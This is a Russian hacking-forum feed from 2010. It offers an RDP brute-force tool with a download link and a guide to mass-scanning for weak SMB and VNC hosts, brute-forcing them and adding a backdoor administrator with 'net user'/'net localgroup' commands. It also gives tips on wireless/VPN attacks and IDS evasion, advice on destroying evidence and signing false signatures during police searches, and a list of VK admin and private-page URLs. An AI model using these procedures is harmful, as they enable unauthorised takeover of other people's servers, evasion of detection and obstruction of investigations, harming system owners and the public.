<p>В системе аутентификации протокола 802.1x могут использоваться различные реализации протокола EAP: EAP-TLS, EAP-TTLS, EAP-PEAP, EAP-LEAP, EAP-MD5. На счет двух последних могу сказать, что они обладают уязвимостями. Существуют софтины leapcrack, Asleap-imp для атаки против EAP-LEAP. EAP-MD5 уязвим к атаке «Man-in-the-Middle». Атакующий может внедрить фальшивую точку доступа между хостом и RADIUS-сервером, перехватив весь передаваемый трафик, в том числе имя и пароль.</p> <p>Техника проникновения в VPN развернутую на базе беспроводной сети аналогична той, что может применяться в проводных сетях. Большинство VPN туннелируют трафик с помощью протоколов PPTP (Point-to-Point Tunneling Protocol) или IPSec. Для PPTP существует сплойт deceit.c от Aleph One. Протестировать на безопасность IPSec поможет тулза Ike-scan.</p> <p>/* Системы IDS */</p> <p>На всем протяжении взлома ты должен не забывать о возможном наличии системы обнаружения вторжений, следящей за функционированием сети и выявляющей различные аномалии в ней, т.е. тебя. Чтобы проникнуть в сеть незаметно, тебе пригодятся некоторые знания о принципах функционирования этих систем. IDS может быть сигнатурной, на основе базы знаний и смешанного типа. Сигнатурные IDS включают в себя базу данных о различных событиях, характерных для определенных атак. Системы на основе базы знаний ведут статистику работы сети при нормальных условиях ее функционирования и сигнализируют о различных отклонениях. Какие же действия взломщика могут вызвать тревогу IDS?</p> <p>Во-первых, это активное сканирование. Поэтому используй только пассивное сканирование. Во-вторых, посылка фреймов с подозрительным ESSID. К числу подозрительных обычно причисляются: пустые, широковещательные ESSID, внесенные в блэк-лист и т.д. (кстати, в этом листе обычно содержаться ESSID, применяемые различными хакерскими прогами, поэтому перед их применением иногда нужно слегка подправить исходники). В-третьих, неправильно подделанный MAC-адрес (дело в том, что MAC-адрес зависит от производителя и от конкретной модели беспроводного оборудования, а IDS очень не нравится, когда попадается оборудование «неизвестного» производителя). Посмотреть диапазоны адресов различного беспроводного оборудования можно в файлах conf/ap_manuf и conf/client_manuf в каталоге, содержащем Kismet.</p> mybb@mybb.ru (Kasper) Mon, 04 Jan 2010 23:17:07 +0300 https://kasper.7li.ru/viewtopic.php?pid=11#p11 https://kasper.7li.ru/viewtopic.php?pid=10#p10 <p>Предоставляю вашему вниманию тестовую версию RDP брута, основанного на всем известном tss бруте.<br /><span style="color: red">Просьба сильно не пинать, версия тестовая!</span><br /> <img class="postimg" loading="lazy" src="https://xmages.net/upload/a0149053.png" alt="http://xmages.net/upload/a0149053.png" /></p> <p><span style="color: green">Вкратце что есть в бруте:</span></p> <p>- Выбор типа сканирования IP: по одному указанному диапазону, либо сразу по списку диапазонов.<br />- Опция потоков для сканера, возможность смены порта для скана<br />- Настройки потоков для брута(сколько IP будет проверятся на отдельном потоке)<br />- Опция выбора логина для брута (можете указать любой вместо стандартного administrator)<br />- Редактирование списка паролей непосредственно из программы<br />- Вывод сбрученных дедов в отдельном окне после финиша брута<br />- Русская справка по нажатию на кнопочке RUS Help</p> <p>Пока все. Ошибок много пока, но брут рабочий. За время тестов было снята порядка 5ти дедов. Главное - не переборщить с колличеством списка IP. Лучше меньше да лучше =)</p> <p><span style="color: red"><strong>Правила работы!!!</strong></span></p> <p><span style="color: red">1) ГЛАВНОЕ!!! Кидаем папку с брутом в корень диска. Любого. Следим шобы не было никакого намека на русские буквы, символы и пробелы в пути к бруту!</span></p> <p>2) Далее - запускаем софтину собственно. Видим окошко. Вот я хз - но помоему там все ясно. Кому не ясно - тыкаем на кнопку RUS help, берем лупу, ручку и тетрадь и переписывает от туда все что написано!!!<br /> <span style="color: green">3) Поэтапные действия:</span>1) Выбираем метод скана (по одному диапазону или по списку) 2) Заполняем поля для диапазонов. Если выбран<br /><span style="color: red">метод по списку</span>, то удостовертесь что в вашем списке<span style="color: red">диапазоны выглядят так и никак иначе!!!</span></p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 7.5em"><pre>127.0.0.1-127.0.100.255 127.0.0.1-127.0.200.255 127.0.0.1-127.0.300.255</pre></div></div></div><p><span style="color: red">Тоесть без всяких пробелов!!!</span></p> <p><em class="bbuline">Ненужно указывать лошадиные диапазоны! Лучше используйте небольшие... типа 127.0.0.1-127.0.255.255 максимум. Иначе сканиться будет долго да и сам брут подвиснет. Лучше наделать маленьких диапазонов и сканить их методом списка диапазонов!</em></p> <p>После того как с диапазонами покончили - жмите скан. Откроется окошко скана и начнется поиск открытых портов на указанных вами диапазонах.<span style="color: red">Запоминайте колличество найденых IP. Оно вам пригодится</span></p> <p>Скан завершится когда окно пропадет. Теперь осталось разобраться с потоками! Допустим насканилось 100 IP. Теперь смотрим сколько нам нужно потоков(исходим из мощностей машины, канала инета и т.п.). Допустим нам<span style="color: red">нужно 5 потоков</span>, делим 100 IP на 5, получаем 20.. Тоесть 20 IP на каждый поток. Вписывем цифру 20 в поле IP's on thread.</p> <p>Ну и последнее - это настройки логина и пароля. По умолчанию стоит стандарт - administrator, но вы можете его заменить на любой другой, вписав свой вариант в соответствующее поле. </p> <p>По нажатию на кнопке pass - появится окно редактирования паролей - там можно добавить или удалить пароли соответственно.</p> <p>Все - теперь все готово - жмем кнопку Start Brute - откроются окошки брутера и начнется перебор.</p> <p>Брут закончится когда пропадут все окошки. Теперь можно нажать на кнопку GetGood и в появившемся окошке скопировать сбрученные деды(если они есть).<br /></p> <p><span style="color: red">Далее шаг последний - нажать на кнопку CleanUP</span>- это нужно для удаления мусора после работы брута. Если кнопку эту не жать, то папка work превратится в хлам и возможны появления ошибок.!</p> <p>Все!</p> <p>Автор - Dizz</p> <p><a href="http://www.proxy-base.org/proxytools/brute.rar" rel="nofollow" target="_blank">Скачать</a><br />Пасс:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>www.proxy-base.org</pre></div></div></div><p><a href="http://grabberz.com/showthread.php?t=18662" rel="nofollow" target="_blank">Такая же тема на гребберзе</a><br /><a href="http://forum.zloy.org/showthread.php?t=80956" rel="nofollow" target="_blank">такая же тема на взлом</a></p> mybb@mybb.ru (Kasper) Mon, 04 Jan 2010 22:04:35 +0300 https://kasper.7li.ru/viewtopic.php?pid=10#p10 https://kasper.7li.ru/viewtopic.php?pid=9#p9 <p>и так приступим .....<br />Мы будем искать деды на открытые порты 139,135 - null session и 5900 - VNC.</p> <p>Можно использовать множество сканеров но я предпочитаю angry ip scanner качаем его<a href="http://rapidshare.com/files/110219861/ipscan.exe.html" rel="nofollow" target="_blank">Качаем</a><br />чтобы было удобно юзать данный сканер создаём баник *.bat файлег с диапазонами в виде</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt</pre></div></div></div><p>отсюда видно что запускается наш сканер ipscan.exe сканирует диапазон от 192.168.0.1 до 192.168.2.2 и сохраняет результат в 192.168.0.1_192.168.2.2.txt<br />Чтобы не мучатся с вбивом диапазонов так как их может быть 400-500 а то и более был написан парсер для этого качаем парсер<br /><a href="http://rapidshare.com/files/110220057/Parser.exe.html" rel="nofollow" target="_blank">Parser</a><br />закидываем в парсер диапазоны в виде 192.168.0.1 192.168.2.2 он нам выдаст их в виде ipscan.exe 192.168.0.1 192.168.2.2 192.168.0.1_192.168.2.2.txt<br />диапазоны по странам можно смотреть тут <a href="http://www.proxyserverprivacy.com/ipaddress_range.php" rel="nofollow" target="_blank">ip rang</a><br />теперь настраиваем наш сканер на скан портов 139,135,5900 и запускаем наш сканер и идем пить кофе ну или лучше поспать <br />после скана одного диапазона создастся файлег в папке с сканером под названием ip от-до.txt(192.168.0.1_192.168.2.2.txt) если вы будете сканить 500 диапазонов то в папке со сканером будет 500 файликов<br />Для удобства парсинга результатов angry был написан еще 1 парсер качаем его<a href="http://rapidshare.com/files/110220183/Parser2.exe.html" rel="nofollow" target="_blank">Parser2</a><br />закидываем в него все результаты от скана он нам разделит ипы на 3 столбца 139 135 5900<br />И так для брута дедов с открытой null session(139,135) я использую NTscan качаем его<a href="http://rapidshare.com/files/110220290/ntscan10.rar.html" rel="nofollow" target="_blank">NTscan</a><br />думаю все разберутся как его юзать.<br />а так же для массавого чека VNC (5900) дедов используем VNCmasss качаем его <a href="http://rapidshare.com/files/110220519/vncmass.rar.html" rel="nofollow" target="_blank">VNCmass</a><br />VNCmasss позволит приконектится к бажному VNC деду без авторизации .</p> <p>Когда NTscan сбрутит деда то пробуем к нему подключиться через RDP если не подключается то значит на деде закрыт порт 3389 про такой дед лучше забыть,а если открыт данный порт на дедике и мы зашли на дед то быстренько создаем учетку<br />cmd<br />net user user pass /add <br />net localgroup Administrators user /add <br />net localgroup &quot;Remote Desktop Users&quot; user /add<br />net accounts /maxpwage:unlimited <br />exit<br />заходм под свеже созданной учеткой и наслаждаемся добытым Дедиком</p> <p>в случае если вы вошли на дед через бажный VNC то так же проверяем открыт ли порт 3389 если порт открыт по такому же примеру приведенному выше создаём учетку<br />Если RDP закрыт то на такой дед можно забить.Бажные Vnc Восновном на XP и толку от таких дедов мало.</p> <p>Удачного всем брута и скана <br />Спасибо за внимание .</p> mybb@mybb.ru (Kasper) Mon, 04 Jan 2010 21:38:06 +0300 https://kasper.7li.ru/viewtopic.php?pid=9#p9 https://kasper.7li.ru/viewtopic.php?pid=8#p8 <p>Пособие по защите своей свободы или каких сюрпризов стоит ожидать.</p> <p>Данная статья расскажет о том, с чем можно столкнуться, если к вам нагрянут сотрудники отдела «К» или ФСБ. Будьте уверены, если они пришли, значит на вас уже что-то есть, иначе бы они и не пошевелились.</p> <p>На пороге…<br />Представьте такую ситуацию - на пороге вашего дома стоят компетентные органы (далее агенты). Обычно в гости они приходят рано утром, с целью застать всех дома. Приблизительное время 6-7 утра. В этот момент, у них уже вероятно есть постановление суда на обыск и заведено уголовное дело, в котором вы проходите пока еще только свидетелем. Допустим, вы знаете наверняка, что за дверью не ваша любимая подруга с бутылочкой холодного пива для вас, тогда первое чем следует заняться, это заметать следы и никак не реагировать на их звонки. Однако времени у вас довольно мало. Если агентам известно наверняка, что вы дома - долго они ждать не будут, в случае чего просто вышибут дверь (приедет наряд). Но это в крайнем случае. Поэтому, необходимо 7 раз подумать, что за информация хранится на вашем харде, возможно следует заранее записывать ее на другой носитель, который легко уничтожить. А убрать информацию с компьютера начисто поможет метод гутмана. При этом лучше все свои девайсы хранить под рукой, прятать смысла нет – все найдут, уж поверьте. Если подвернется удачный момент, даже на глазах у агентов не стесняйтесь ломать диски и топтать флэшки.<br />Вы защищаете свою свободу!</p> <p>Проникли внутрь…<br />Итак, либо вам повезло, и вы успели все или часть уничтожить, либо пеняйте на себя. В любом случае, к вам в дом проникли агенты. Они предъявляют удостоверения и зачитывают вам постановление на обыск если у них такой имеется (скорее всего это так). Затем требуют отключить все телефоны и показать месторасположение компьютера или отойти от него. Дальше они начнут расхаживать по вашей квартире как у себя дома и задавать вопросы. Первое что они спросят: “Есть ли в доме оружие или наркотические вещества?”. Если ни того, ни другого у вас нет, можете облегченно вздохнуть. Если есть - вам масштабно не повезло. На всякий случай у них имеется фото-камера, чтобы зафиксировать к примеру ваш рабочий стол. Место где стоит компьютер. А так же нарисуют схему квартиры, укажут где какие розетки и так далее. Запишут какие процессы запущены (если компьютер был включенным), какие программы работали.</p> <p>Так как теперь вам нечем заняться, можете наблюдать, как в вашем доме все переворачивают. Процедура обыска проходит в присутствии понятых. Понятыми могут быть, например студенты, проходящие практику в тех же органах власти . якобы они не имеют никакого отношения к конечному результату дела. Далее на ваших глаза изымают ваш же системник, модем, еще и принтер могут прихватить, а так же любые предметы, которые могут быть использованы против вас в суде. В первую очередь это: диски, флэшки, записные книжки, листы бумаги (достанут даже из урны), журналы, ваш фотоальбом. Они имеют право изъять все, что посчитают нужным. </p> <p>Далее будет составлен протокол обыска, т.е. список изъятого. Отмечу, что процесс этот очень долгий и у вас есть время обдумать ситуацию. Но пока вы думаете, не забывайте думать об этом молча. И не отвечать ни на какие вопросы следователей. ответите как придет адвокат, если сочтете нужным. На протоколе вы должны будете поставить подпись. Все кто присутствовал в этот момент в квартире в будущем могут быть использованы в качестве свидетелей и быть допрошены на факт того, что вы за человек такой. По-этому не стоит надеется, что показания вашего брата или например отца не смогут повлиять на исход дела. Смогут! Еще как смогут! Спросят у них..., а потом окажется что вы опытный пользователь и более того... Рекомендую на протоколе обыска и всех прочих бумагах где вам велят поставить подпись, не ставить свою обычную подпись и по возможности вообще отказаться от данной процедуры. В дальнейшем ваши каракули могут использовать в различных нехороших целях! Например, вашему возможному напарнику предъявят ложный документ, в котором вы его полностью палите с вашей же подписью, которую он за 10 лет видел много раз. Думаю с этим все ясно. Так что сразу задумайтесь к кому еще могли прийти. Неплохо было бы заранее обговаривать подобную ситуацию, но всего не учтешь, как бы этого не хотелось. </p> <p>После составления протокола, агенты просят вас проехать с ними. Отказаться вы не можете.</p> <p>Давление<br />И вот, вы сидите в кабинете следователя. Сейчас начнется давление и будет это не как в кино. Бить вас не станут, но психологическими атаками по мозгу надают, то по одному, то группой сотрудников. В том числе ожидайте различных игр вроде – «добрый полицейский, злой полицейский». Вас заверят, что уже все знают, и вы напрасно тянете время. Попытаются зацепить ваше самолюбие, рассказывая какой вы крутой хакер и что вы превосходно кого-то взломали, да еще и искали они вас очень долго. Все что они говорят, можно смело пропустить мимо ушей. Запомните простую вещь, не верьте ни одному слову, сказанному агентами, и сами ничего не говорите. Если уж надумаете что-то говорить, то говорите коротко – «да» или «нет», не нужно давать развернутых ответов. <br />На все ваши ответы или же вопросы заданные ими будут отслеживаться жесты, мимика, в общем ваша обратная реакция. Этому их тоже учат. Так же как учат этому в различных центрах по НЛП. Если надумаете врать что-то, то это весьма рискованный шаг. И без хорошей подготовке, вы только затяните петлю у себя на шее.</p> <p>Спустя N-ое количество времени и попыток выбить из вас признание и любую другую информацию, агенты, наконец, зачитают вам ваши права. Только с этого момента начинают работать юридические законы. Теперь вы законно включаете свой мобильный и набираете номер адвоката. У вас еще нет знакомого адвоката? Поспешите обзавестись, ОЧЕНЬ пригодится. </p> <p>Фух…приходит адвокат, и вы уже чувствуете, что практически на свободе. Но знайте, что каждый человек (есть у него адвокат или нет), имеет право отказаться от дачи показаний по статье 51 УК РФ. Можете следователю так сразу и сказать, как только он зачитал вам ваши права. Вот что нужно сказать: “Я отказываюсь от дачи показаний согласно статье 51 УК РФ”. И все. Что может быть проще? После этого вас должны временно отпустить. Но если у вас есть адвокат, лучше конечно же дождаться его прихода!</p> <p>Радоваться рано. Все только началось!<br />Пока идет следствие (опрашивают ваших соседей, проверяют ваш компьютер, наводят справки о вас (школа, вуз, места где вы можете стоять на учете), как бы и так уже у них была о вас информация, но теперь она стала приобретать официальный характер и все записывается в ваше уголовное дело, где вы с момента как вам зачитали права становитесь обвиняемым.<br />Стоит задуматься, кого следует предупредить, что с вами случилась такая беда. И лучше вы сделаете это прежде, чем это сделают они. Ну а дальше, вы будете знакомиться с делом, писать жалобы, снова знакомиться, и в итоге дело передадут в суд по месту вашего проживания. Жалобы должны содержать минимум информации, но все четко по делу. Что изъятое вам не принадлежит, вы компьютером пользоваться не умеете и искренне просите остановить следствия против вас.</p> <p>В итоге<br />Подводя итоги, я хочу сказать следующее, писать можно очень много, но попробуем как-то структурировать все выше сказанное и по пунктам расписать, что же все таки лучше всего делать и не делать.</p> <p>Не стоит:<br />1. Ставить где бы то ни было свои подписи до того как вы побывали в их заведении и вам зачитали права. А если и ставить, то уж точно не свою.<br />2. Подумать, к кому еще могли прийти, потому что если вас поймали как группу, то согласно статей (272-274), вас и судить будут как группу, что совсем не лучше, если бы вы были один. Так что, тот кто все палит вдвойне пострадает. Ни себе ни людям. Если вы думаете, что после обещаний того, что если вы все расскажите - вас отпустят, то можете про это забыть. В лучшем случае, просто смениться следователь и новый следователь скажет, что вообще ничего не знает, кто вам там что обещал...<br />3. Общаться в кабинете куда тебя привезли. Этого то от тебя и ждут! Ничего им не говори, пока не пришел адвокат. Или пока не зачитали права. Как только зачитали, сразу отказывайтесь от дачи показаний.<br />4. Важный момент, никогда не стоит полагаться на честность друзей, своих напарников, знакомых, и даже родственников. Под давлением компетентных органов могут случаться различные неприятные моменты. В этой “войне” ты и только ты себе можешь помочь. Не стоит даже так уж надеяться на адвоката. Они тоже люди и у них естественно существуют свои методы работы и взаимодействия с прокурорами, судьями и даже теми же органами власти. Эта их работа.<br />5. Забирать какие-либо уже изъятые у тебя вещи. Они ведь не тебе принадлежат, так ведь?! Иначе это практически доказывает, тот факт, что диск с вирусами, который тебе отдали принадлежит именно тебе.</p> <p>Что стоит предпринять:<br />1. Сменить номер телефона. И зарегистрировать симку на друга. Ни в коем случае не звонить напарникам, если такие есть или кому бы то ни было кто имеет хоть какое-то отношение ко всему этому. Лучше уж лично со всеми с кем считаете нужным встретиться и обсудить. И вообще постараться в ближайшее время на время следствия забыть о появлении в сети. А то скажут потом, что и во время следствия не прекращал пакостить и так далее.</p> <p>2. Нанять хорошего адвоката. Думаю, свобода дороже денег. Но лучше, если это будет проверенный адвокат, друг семьи или возможно родственник. Советую такого найти иначе вы лишь зря потратите деньги, время и нервы!</p> <p>3. Помните, что все что происходит в кабинете, записывается на видео. (это чтобы все было честно и справедливо и вы не могли например дать взятку следователю или иному лицу который вас в чем то обвиняет). Как минимум записывается звук.</p> <p>4. Если тебя вызывают, приходить только по повестке. Если вам звонят и просят подойти в такое-то время к ним, помните, что вы можете легко на это дело забить.</p> <p>5. Учесть тот факт, что согласно закону, провайдеры (и не только они) с удовольствием предоставят правоохранительным органам все лог файлы и прочую необходиму информацию, за любой период.</p> <p>Важно:<br />Если даже с вашего компьютера и с вашего ip адреса следствием было доказано, что было нарушение закона, то это еще не говорит, о том, что именно вы это сделали, а не кто-то другой, например вредоносная программа или вирус, который к вам пробрался и сам там все натворил. Нужно не забыть, что если вы хотите, чтобы в конечном итоге, независимо от результатов вам вернули компьютер, модем и т.д., то нужно передать права собственности всего изъятого на своих родственников, или друзей, которые смогут это подтвердить. А именно твердить в деле, что все изъятое вам не принадлежит. И уж тем более не стоит надеется на лояльность агентов и их благосклонность к вам. Их работа – ограничить вашу свободу, что в большинстве случаев, так и бывает.</p> <p>(с) goodgod<br />Все мысли написаны опираясь на личный опыт. <br />Ничего личного к сотрудникам и органам власти я не имею.</p> mybb@mybb.ru (Kasper) Mon, 04 Jan 2010 20:55:13 +0300 https://kasper.7li.ru/viewtopic.php?pid=8#p8 https://kasper.7li.ru/viewtopic.php?pid=7#p7 <p>[youtube]http://www.youtube.com/watch?v=jw2WYUDm0wE[/youtube]</p> mybb@mybb.ru (Kasper) Mon, 04 Jan 2010 06:17:50 +0300 https://kasper.7li.ru/viewtopic.php?pid=7#p7 https://kasper.7li.ru/viewtopic.php?pid=5#p5 <p>Достаточно удобный и простой способ. Чтобы скачать аудиозапись,зайдите на любую страничку, где они находятся (В своих аудиозаписях, аудиозаписяхгруппы или у друзей)Скопируйте этот скрипт в буфер обмена:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre> javascript:function operate(konfuze,loves,you,all_,xP){you=you.toString(10);while(you.length&lt;5){you='0'+you;}document.getElementById('audio'+konfuze).innerHTML='&lt;div&gt;&lt;a href=&quot;http://cs'+loves+'.vkontakte.'+'ru/u'+you+'/audio/'+all_+'.mp3&quot;&gt;CКАЧАТЬ '+document.getElementById('performer'+konfuze).innerHTML+'- '+document.getElementById('title'+konfuze).innerHTML+'&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;';}</pre></div></div></div><p>Вставте скрипт в строку адреса, на страницу с аудиозаписями.Потом,нажмите клавишу Enter на&#160; вашей клавиатуре.На первый взгляд ничего не произойдёт. Но на самом деле, теперь, после того как вы будите нажимать на кнопочку Play будет появляться ссылка с нужной звукозаписью в формате mp3.<br />Кликайте правой кнопкой мыши, и выбирайте «Сохранить объект как...»</p> mybb@mybb.ru (Kasper) Mon, 04 Jan 2010 05:52:29 +0300 https://kasper.7li.ru/viewtopic.php?pid=5#p5 https://kasper.7li.ru/viewtopic.php?pid=3#p3 <p>Вместо USERID/GROUPID номер того, у кого надо посмотреть.</p> <p>Чужой рейтинг: <a href="http://vkontakte.ru/rate.php?act=vote&amp;id=USERID" rel="nofollow" target="_blank">http://vkontakte.ru/rate.php?act=vote&amp;id=USERID</a></p> <p>Чужие приложения: <a href="http://vkontakte.ru/apps.php?mid=USERID" rel="nofollow" target="_blank">http://vkontakte.ru/apps.php?mid=USERID</a></p> <p>Чужие вопросы: <a href="http://vkontakte.ru/questions.php?mid=USERID" rel="nofollow" target="_blank">http://vkontakte.ru/questions.php?mid=USERID</a></p> <p>Чужие статусы (применять на своей странице):<br />javasсript: getActivityHistory(USERID)<br /><a href="http://vkontakte.ru/profile.php?id=" rel="nofollow" target="_blank">http://vkontakte.ru/profile.php?id=</a> USERID&amp;activityhistory=1<br />ОЧЕНЬ РЕДКО прокатывает с закрытыми юзерами</p> <p>Статистика любой группы: <a href="http://vkontakte.ru/stats.php?gid=GROUPID" rel="nofollow" target="_blank">http://vkontakte.ru/stats.php?gid=GROUPID</a></p> <p>Отображение закрытой страницы при переходе: <br /><a href="http://vkontakte.ru/search.php?id=USERID" rel="nofollow" target="_blank">http://vkontakte.ru/search.php?id=USERID</a><br />Например, если закрыть страницу, можно набрать эту ссылку и свой ID.</p> <p>Список ошибок, набор вручную:<br /><a href="http://vkontakte.ru/blank.php?code=" rel="nofollow" target="_blank">http://vkontakte.ru/blank.php?code=</a></p> <p>Все языки:<br /><a href="http://vkontakte.ru/settings.php?act=languages" rel="nofollow" target="_blank">http://vkontakte.ru/settings.php?act=languages</a></p> <p>Страница администратора (не пускает )<br /><a href="http://vkontakte.ru/album5009611_94648067" rel="nofollow" target="_blank">http://vkontakte.ru/album5009611_94648067</a> (Спасибо id42329892)<br /><a href="http://vkontakte.ru/admin.php" rel="nofollow" target="_blank">http://vkontakte.ru/admin.php</a><br /><a href="http://vkontakte.ru/admin.php?act=error_item" rel="nofollow" target="_blank">http://vkontakte.ru/admin.php?act=error_item</a><br />Репорты:<br />http://vkontakte .ru/admin.php?act=reports_details&amp;item_id=[id]&amp;item_type=[type]</p> <p>Добавление страницы пунктов:<br />http://vkontakte .ru/admin.php?act=a_added_items_page&amp;index=page&amp;filter =[filter_current]&amp;c=[]</p> <p>Дать пользователю права модератора:<br />http://vkontakte .ru/admin.php?act=a_add_informer_moder&amp;page=[]</p> <p>Снять с пользователя права модератора:<br />http://vkontakte .ru/admin.php?act=a_remove_informer_moder&amp;moder_id=[id]</p> <p>Повторить чтото с правами модератора:<br />http://vkontakte .ru/admin.php?act=a_return_informer_moder&amp;moder_id=[id]</p> <p>Рапорт о исправлении ненастоящей информации(!):<br /><a href="http://vkontakte.ru/admin.php?act=fixed&amp;wid=USERID" rel="nofollow" target="_blank">http://vkontakte.ru/admin.php?act=fixed&amp;wid=USERID</a><br />Принцип: Номер в очереди, получивших табличку.<br />Пример: У вас номер 1000. Следующий получит номер 1001. И т.д.</p> <p>Удалить все сообщения разом:<br /><a href="http://vkontakte.ru/mail.php?act=msgOutboxDel" rel="nofollow" target="_blank">http://vkontakte.ru/mail.php?act=msgOutboxDel</a> - исходящие<br /><a href="http://vkontakte.ru/mail.php?act=msgInboxDel" rel="nofollow" target="_blank">http://vkontakte.ru/mail.php?act=msgInboxDel</a> - входящие</p> <p>Добавить в закладки закрытого юзера:<br /><a href="http://vkontakte.ru/fave.php?act=addPerson&amp;mid=U..." rel="nofollow" target="_blank">http://vkontakte.ru/fave.php?act=addPerson&amp;mid=U...</a></p> <p>Ещё немного пасхалок:<br />Группа FLASH API, отдел новостей, страница свободна для редактирования всем без исключений -<br />Павел Дуров<br />Группа FLASH API, под-раздел новостей -<br />Recent News<br />Старый поиск<br /><a href="http://vkontakte.ru/search.php" rel="nofollow" target="_blank">http://vkontakte.ru/search.php</a><br />Очень странная страница <br /><a href="http://vkontakte.ru/inv.php" rel="nofollow" target="_blank">http://vkontakte.ru/inv.php</a><br />Супер-старая страница FAQ<br /><a href="http://vkontakte.ru/faq.php" rel="nofollow" target="_blank">http://vkontakte.ru/faq.php</a><br />Старая страница FAQ<br /><a href="http://vkontakte.ru/help.php" rel="nofollow" target="_blank">http://vkontakte.ru/help.php</a><br />Старые новости<br /><a href="http://vkontakte.ru/news.php" rel="nofollow" target="_blank">http://vkontakte.ru/news.php</a><br />Простой поиск<br /><a href="http://vkontakte.ru/search.php?act=mixed" rel="nofollow" target="_blank">http://vkontakte.ru/search.php?act=mixed</a><br />Старый поиск по видео<br /><a href="http://vkontakte.ru/videosearch.php" rel="nofollow" target="_blank">http://vkontakte.ru/videosearch.php</a><br />События<br /><a href="http://vkontakte.ru/ebrowse.php" rel="nofollow" target="_blank">http://vkontakte.ru/ebrowse.php</a><br />Скрытая ссылка из меню выше<br /><a href="http://vkontakte.ru/gsearch.php?from=people&amp;sort=-1" rel="nofollow" target="_blank">http://vkontakte.ru/gsearch.php?from=people&amp;sort=-1</a><br />Старое введение<br /><a href="http://vkontakte.ru/help.php?page=demo" rel="nofollow" target="_blank">http://vkontakte.ru/help.php?page=demo</a><br />Профессиональные контакты (?)<br /><a href="http://vkontakte.ru/pro.php" rel="nofollow" target="_blank">http://vkontakte.ru/pro.php</a><br />Старое оформление<br /><a href="http://vkontakte.ru/images/header.gif" rel="nofollow" target="_blank">http://vkontakte.ru/images/header.gif</a><br /><a href="http://vkontakte.ru/images/header_divider.gif" rel="nofollow" target="_blank">http://vkontakte.ru/images/header_divider.gif</a><br /><a href="http://vkontakte.ru/images/xhead.gif" rel="nofollow" target="_blank">http://vkontakte.ru/images/xhead.gif</a></p> <p>Старая страница регистрации<br /><a href="http://vkontakte.ru/reg.php" rel="nofollow" target="_blank">http://vkontakte.ru/reg.php</a><br />Java-скрипты и CSS-стили, выдрано<br />* <a href="http://vkontakte.ru/js/langRus.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/langRus.js</a><br />* <a href="http://vkontakte.ru/js/langEng.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/langEng.js</a><br />* <a href="http://vkontakte.ru/js/common.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/common.js</a><br />* <br />* <a href="http://vkontakte.ru/js/basic.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/basic.js</a><br />* <a href="http://vkontakte.ru/js/typeahead.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/typeahead.js</a><br />* <a href="http://vkontakte.ru/js/suggest.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/suggest.js</a><br />* <a href="http://vkontakte.ru/js/account.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/account.js</a><br />* <a href="http://vkontakte.ru/js/effects.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/effects.js</a><br />* <a href="http://vkontakte.ru/js/niftycube.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/niftycube.js</a><br />* <a href="http://vkontakte.ru/js/select.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/select.js</a><br />* <a href="http://vkontakte.ru/js/box.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/box.js</a><br />* <a href="http://vkontakte.ru/js/functions.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/functions.js</a><br />* <a href="http://vkontakte.ru/js//js/audio.js" rel="nofollow" target="_blank">http://vkontakte.ru/js//js/audio.js</a><br />* <a href="http://vkontakte.ru/js/swfobject.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/swfobject.js</a><br />* <a href="http://vkontakte.ru/js/profile.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/profile.js</a><br />* <a href="http://vkontakte.ru/js/simpleajax.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/simpleajax.js</a><br />* <a href="http://vkontakte.ru/js/lib/utils.js" rel="nofollow" target="_blank">http://vkontakte.ru/js/lib/utils.js</a></p> <p>* <a href="http://vkontakte.ru/css/nopadding.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/nopadding.css</a><br />* <a href="http://vkontakte.ru/css/admin2.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/admin2.css</a><br />* <a href="http://vkontakte.ru/css/account.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/account.css</a><br />* <a href="http://vkontakte.ru/css/box.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/box.css</a><br />* <a href="http://vkontakte.ru/css/rustyle.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/rustyle.css</a><br />* <a href="http://vkontakte.ru/css/ie.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/ie.css</a><br />* <a href="http://vkontakte.ru/css/ie7.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/ie7.css</a><br />* <a href="http://vkontakte.ru/css/rustylex.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/rustylex.css</a><br />* <a href="http://vkontakte.ru/css/mail2.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/mail2.css</a><br />* <a href="http://vkontakte.ru/css/search.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/search.css</a><br />* <a href="http://vkontakte.ru/css/dialog2.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/dialog2.css</a><br />* <a href="http://vkontakte.ru/css/account.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/account.css</a><br />* <a href="http://vkontakte.ru/css/help.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/help.css</a><br />* <a href="http://vkontakte.ru/css/profile.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/profile.css</a><br />* <a href="http://vkontakte.ru/css/player.css" rel="nofollow" target="_blank">http://vkontakte.ru/css/player.css</a></p> <p>Архивы<br /><a 